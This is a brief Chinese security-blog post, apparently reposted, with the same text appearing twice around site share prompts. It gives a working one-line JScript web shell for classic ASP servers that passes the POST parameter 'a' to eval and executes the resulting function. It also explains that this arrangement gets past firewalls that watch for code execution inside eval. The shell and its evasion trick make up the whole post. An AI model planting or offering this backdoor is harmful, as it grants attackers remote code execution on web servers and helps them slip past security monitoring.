一句话代码:
<script language="javascript" runat="server">
Response.Write (({"a": eval(Request.Form("a").Item)}).a.a());
</script>
利用语句(参数a=):
原理是eval内部生成函数,然后外部执行。可以过一些检测eval内代码执行行为的防火墙。
来源 网络..
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
聚合网络安全,存储安全技术文章,融合安全最新讯息
一句话代码:
<script language="javascript" runat="server">
Response.Write (({"a": eval(Request.Form("a").Item)}).a.a());
</script>
利用语句(参数a=):
原理是eval内部生成函数,然后外部执行。可以过一些检测eval内代码执行行为的防火墙。
来源 网络..
评论